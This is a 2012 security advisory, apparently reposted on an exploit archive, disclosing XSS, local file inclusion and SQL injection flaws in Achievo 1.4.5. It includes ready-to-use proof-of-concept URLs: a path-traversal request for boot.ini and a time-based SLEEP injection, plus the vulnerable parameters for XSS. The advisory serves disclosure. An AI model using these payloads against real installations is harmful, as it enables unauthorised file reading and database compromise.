Achievo 1.4.5 XSS / LFI / SQL Injection Vulnerabilities

2012-11-02T00:00:00
ID 1337DAY-ID-19678
Type zdt
Reporter Canberk BOLAT
Modified 2012-11-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Information
--------------------
Name :  XSS, LFI and SQL Injection Vulnerabilities in Achievo
Software :  Achievo 1.4.5 and possibly below.
Vendor Homepage :  http://www.achievo.org
Vulnerability Type :  Cross-Site Scripting, Local File Inclusion and SQL
Injection
Severity :  Critical
Researcher :  Canberk Bolat
Advisory Reference :  NS-12-016
 
Description
--------------------
Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities will enable
organisations to support their business processes in a simple, but
effective manner.
 
Details
--------------------
Achievo is affected by XSS, LFI and SQL Injection vulnerabilities in
version 1.4.5.
XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid,
atkselector, atkfilter, searchString)
LFI:
http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3
SQL Injection:
http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
You can read the full article about Cross-Site Scripting, LFI and SQL
Injection vulnerabilities from here:
 
Cross-site Scripting (XSS):
http://www.mavitunasecurity.com/crosssite-scripting-xss/
Local File Inclusion: http://www.mavitunasecurity.com/local-file-inclusion/
Blind SQL Injection: http://www.mavitunasecurity.com/blind-sql-injection/
 
Solution
--------------------
-
 
Advisory Timeline
--------------------
23/01/2011 - First contact
25/02/2012 - Second contact - No response
01/11/2012 - Advisory released
 
Credits
--------------------
It has been discovered on testing of Netsparker, Web Application Security
Scanner - http://www.mavitunasecurity.com/netsparker/.
 
References
--------------------
Vendor Url / Patch : -
MSL Advisory Link :
http://www.mavitunasecurity.com/xss-lfi-and-sql-injection-vulnerabilities-in-achievo/
Netsparker Advisories :
http://www.mavitunasecurity.com/netsparker-advisories/

#  0day.today [2018-01-03]  #